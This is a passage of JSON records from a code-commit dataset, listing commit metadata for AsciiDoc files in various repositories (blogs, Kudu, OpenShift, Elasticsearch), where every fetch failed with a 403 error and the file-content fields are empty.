2015-10-22-Specs-vs-Common-Sense.adoc","message":"Update 2015-10-22-Specs-vs-Common-Sense.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-10-22-Specs-vs-Common-Sense.adoc","new_file":"_posts\/2015-10-22-Specs-vs-Common-Sense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cb0382d68486f4d0e714ec93cd7663e8307f4dd","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b2da02b1383d1211a85ba2769d90bb3e024bcb0","subject":"Update 2017-01-17-Writing-a-Jenkinsfile.adoc","message":"Update 2017-01-17-Writing-a-Jenkinsfile.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2017-01-17-Writing-a-Jenkinsfile.adoc","new_file":"_posts\/2017-01-17-Writing-a-Jenkinsfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c54d56bb6db735eab18a5be51d350afd9f8c951","subject":"Update 2017-03-28-Testando.adoc","message":"Update 2017-03-28-Testando.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-03-28-Testando.adoc","new_file":"_posts\/2017-03-28-Testando.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5084bc1d42af275101579f450682a2df7afe2173","subject":"Update 2017-10-01-raindrop.adoc","message":"Update 2017-10-01-raindrop.adoc","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-raindrop.adoc","new_file":"_posts\/2017-10-01-raindrop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"496e3bc367ea932975b26bc161bc1b36e10dd064","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9509df4814022b0f4a67d9cd350afefc66f7f75a","subject":"Update 2017-05-16.adoc","message":"Update 2017-05-16.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16.adoc","new_file":"_posts\/2017-05-16.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dbe0d0b61d2e574ff2c26c5e7d480f226fc995d","subject":"Fixup the release notes documentation","message":"Fixup the release notes documentation\n\nThere was two broken links and I changed the text about installing Kudu to reflect that it doesn't\nhave any dependencies on Cloudera software.\n\nChange-Id: I7c1cca555a343e41d40ac315b695e0c05e3bc2a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1181\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fceb3d44e593aa31b27713b5299d479d5b03ca4","subject":"Core readme","message":"Core readme\n","repos":"jerr\/jbossforge-core,forge\/core,agoncal\/core,oscerd\/core,agoncal\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,stalep\/forge-core,stalep\/forge-core,forge\/core,ivannov\/core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,forge\/core,oscerd\/core,D9110\/core,oscerd\/core,oscerd\/core,D9110\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,D9110\/core,pplatek\/core,pplatek\/core,ivannov\/core,agoncal\/core,oscerd\/core,ivannov\/core,forge\/core,oscerd\/core,agoncal\/core,forge\/core,agoncal\/core,D9110\/core,jerr\/jbossforge-core,agoncal\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,jerr\/jbossforge-core,oscerd\/core,ivannov\/core,forge\/core,oscerd\/core,ivannov\/core,ivannov\/core,jerr\/jbossforge-core,agoncal\/core,agoncal\/core,pplatek\/core,forge\/core,ivannov\/core,pplatek\/core,D9110\/core,pplatek\/core,pplatek\/core","old_file":"core\/README.asciidoc","new_file":"core\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 
403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"786821c8054da21bfabad5a5a876c1d2a9c29342","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee10c20c71be19d1ad4073f8497e3da4657dd1ff","subject":"Create YAML2SpecificationCompliance.adoc","message":"Create YAML2SpecificationCompliance.adoc\n\nSeparate YAML sections from ReadMe.adoc","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"YAML2SpecificationCompliance.adoc","new_file":"YAML2SpecificationCompliance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0140580fbb525383acc0957acb5d54b881a40761","subject":"Update 2016-03-24-Contact-us.adoc","message":"Update 2016-03-24-Contact-us.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-24-Contact-us.adoc","new_file":"_posts\/2016-03-24-Contact-us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2778c3ceea22c85139a9edf2a882db88e632bdb3","subject":"Update 2016-08-31-Title-Here.adoc","message":"Update 2016-08-31-Title-Here.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Title-Here.adoc","new_file":"_posts\/2016-08-31-Title-Here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e4fcb870bd98d1999a672a17212e045983131b0","subject":"using consistent title markers","message":"using consistent title markers\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"docker-java-lab.adoc","new_file":"docker-java-lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e777d5462290ec8f9f91198aee556f507aa85f85","subject":"Update 20161110-1232-showoff-zone-owo.adoc","message":"Update 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone-owo.adoc","new_file":"_posts\/20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"da59b81e73ab1717cf6092756be45a41c30f05dc","subject":"added readme","message":"added readme\n","repos":"tomasonjo\/neo4j-graph-algorithms","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomasonjo\/neo4j-graph-algorithms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5ac00c792616a6935e9786dd0183b33b3e6dfc9","subject":"[docs] Add security guide","message":"[docs] Add security guide\n\nChange-Id: Iabf60804975dc105243626be48d3a141c9a4dab5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6479\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"547f2a649edbdabc9653c0c0dedf9e904f0dcff7","subject":"add in gluster-setup document","message":"add in gluster-setup document\n","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"examples\/gluster\/gluster-setup.adoc","new_file":"examples\/gluster\/gluster-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f01480e15dbfdaec0e48409f5f1f5b78c56354b7","subject":"Create README.adoc","message":"Create README.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"flyway\/README.adoc","new_file":"flyway\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d52b7b40e75e125a34f486ef3833ab3869110f59","subject":"Update README.adoc","message":"Update README.adoc","repos":"KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"yet-another-docker-its\/README.adoc","new_file":"yet-another-docker-its\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8162876119549b87d2ac63c11ed4521e4cbf44","subject":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba22b307780d448ff9b7632afb8cb4b97ab1ad2b","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"810de2dccf6cbacf2271831c12d21bd847943e6e","subject":"Update 2016-06-12-Swim-Times-280416-02062016.adoc","message":"Update 2016-06-12-Swim-Times-280416-02062016.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-06-12-Swim-Times-280416-02062016.adoc","new_file":"_posts\/2016-06-12-Swim-Times-280416-02062016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e3c4781d3c9b66e6c5c303d6e4626427639edc","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28242bf05714a962b67cbf5f9bcef7d64f998b81","subject":"Update Hello World! article","message":"Update Hello World! 
article\n","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-27-Hello-World!.adoc","new_file":"_posts\/2017-05-27-Hello-World!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b792afa6a2d5e650538e31e1468539a5919c4d57","subject":"Create index-es.adoc","message":"Create index-es.adoc\n\nSpanish translation for index.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/index-es.adoc","new_file":"src\/index-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcbb2899c954cc99f094d336b33cd2f22bd1d189","subject":"add learn clojure answers","message":"add learn clojure answers\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/learn\/answers.adoc","new_file":"content\/guides\/learn\/answers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9733a1eda041991bace5b2eef075876d0c60e400","subject":"Update 2017-06-13-Kotlin-Style-Guides.adoc","message":"Update 2017-06-13-Kotlin-Style-Guides.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-13-Kotlin-Style-Guides.adoc","new_file":"_posts\/2017-06-13-Kotlin-Style-Guides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9efce7dcce380344210e871db0b9e5b9af983de","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3777e3e5ea534819a8ed01b1d397f32df0af4da3","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028ba01f8561a4670ad432f1abc39dd81f6bee6b","subject":"Update generated files","message":"Update generated files\n\nSigned-off-by: Clement Escoffier 
<6397137e57d1f87002962a37058f2a1c76fca9db@gmail.com>\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/cheatsheet\/HttpClientOptions.adoc","new_file":"rx-java\/src\/main\/asciidoc\/cheatsheet\/HttpClientOptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"437663cca4f59ee72926e1c3a352058b7a03c807","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c8b2a058da8bb9a5713d7db1209c41c466a2b9","subject":"Fixed bug in developer manual","message":"Fixed bug in developer manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eacb46a31a7c34a263fd56c079d6f0ee182b844a","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nFix \"help wanted\" label link","repos":"ramr\/origin,sjug\/origin,akram\/origin,liangxia\/origin,sjug\/origin,luciddreamz\/origin,jeremyeder\/origin,mfojtik\/origin,hroyrh\/origin,linzhaoming\/origin,tnozicka\/origin,liangxia\/origin,openshift\/origin,liangxia\/origin,pweil-\/origin,dinhxuanvu\/origin,anpingli\/origin,pweil-\/origin,JacobTanenbaum\/origin,spadgett\/origin,soltysh\/origin,luciddreamz\/origin,jeremyeder\/origin,jim-minter\/origin,mkumatag\/origin,pweil-\/origin,aveshagarwal\/origin,spadgett\/origin,aveshagarwal\/origin,imcsk8\/origin,soltysh\/origin,mdshuai\/origin,liangxia\/origin,jim-minter\/origin,markllama\/origin,kargakis\/origin,jeremyeder\/origin,spadgett\/origin,hroyrh\/origin,markllama\/origin,imcsk8\/origin,gabemontero\/origin,ingvagabund\/origin,openshift\/origin,kargakis\/origin,xiuwang\/origin,openshift\/origin,sjug\/origin,JacobTanenbaum\/origin,hroyrh\/origin,jeremyeder\/origin,Miciah\/origin,csrwng\/origin,tnozicka\/origin,linzhaoming\/origin,enj\/origin,coreydaley\/origin,ramr\/origin,pecameron\/origin,childsb\/origin,gabemontero\/origin,deads2k\/origin,mahak\/origin,deads2k\/origin,ingvagabund\/origin,deads2k\/origin,kargakis\/origin,dinhxuanvu\/origin,linzhaoming\/origin,luciddreamz\/origin,sdminonne\/origin,mdshuai\/origin,nak3\/origin,akram\/origin,sallyom\/origin,nak3\/origin,sallyom\/origin,liangxia\/origin,sallyom\/origin,dinhxuanvu\/origin,tnozicka\/origin,luciddreamz\/origin,JacobTanenbaum\/origin,tnozicka\/origin,mfojtik\/origin,sferich888\/origin,mkumatag\/origin,spadgett\/origin,childsb\/origin,mahak\/origin,sdminonne\/origin,jsafrane\/origin,mdshuai\/origin,ramr\/origin,sferich888\/origin,linzhaoming\/origin,jim-minter\/origin,pecameron\/origin,soltysh\/origin,childsb\/origin,childsb\/origin,Miciah\/origin,childsb\/origin,ramr\/origin,markllama\/origin,kargakis\/origin,bparees\/origin,
mkumatag\/origin,mdshuai\/origin,csrwng\/origin,mahak\/origin,linzhaoming\/origin,sdminonne\/origin,nak3\/origin,csrwng\/origin,xiuwang\/origin,markllama\/origin,jeremyeder\/origin,sferich888\/origin,ingvagabund\/origin,spadgett\/origin,imcsk8\/origin,aveshagarwal\/origin,childsb\/origin,tnozicka\/origin,enj\/origin,markllama\/origin,akram\/origin,coreydaley\/origin,xiuwang\/origin,imcsk8\/origin,dinhxuanvu\/origin,coreydaley\/origin,kargakis\/origin,luciddreamz\/origin,jsafrane\/origin,ironcladlou\/origin,bparees\/origin,aveshagarwal\/origin,mdshuai\/origin,liangxia\/origin,mdshuai\/origin,Miciah\/origin,bparees\/origin,imcsk8\/origin,anpingli\/origin,ironcladlou\/origin,ramr\/origin,enj\/origin,gabemontero\/origin,markllama\/origin,luciddreamz\/origin,imcsk8\/origin,dinhxuanvu\/origin,pecameron\/origin,tnozicka\/origin,aveshagarwal\/origin,ironcladlou\/origin,mfojtik\/origin,kargakis\/origin,anpingli\/origin,jsafrane\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spadgett\/origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9e0e191b05eea0883b43c1730ba094b5c0bbb98","subject":"KUDU-1211 Document specific steps for Impala_Kudu installation","message":"KUDU-1211 Document specific steps for Impala_Kudu installation\n\nChange-Id: If6871a2dd41525b960a62d210dbd21f5b59fe611\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1270\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-by: Martin Grund <2546548d516fa64c411fde8242af35f3f80ad31f@cloudera.com>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10390a5e50baf75ecc9677cc2f45a082528fef8a","subject":"[DOCS] Forward-fit example output for DELETE model snapshot API","message":"[DOCS] Forward-fit example output for DELETE model snapshot API\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@d847776203c09d090b07f10eb779dfaa5b90e0d5\n","repos":"gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,HonzaKral\/elasticsearch,s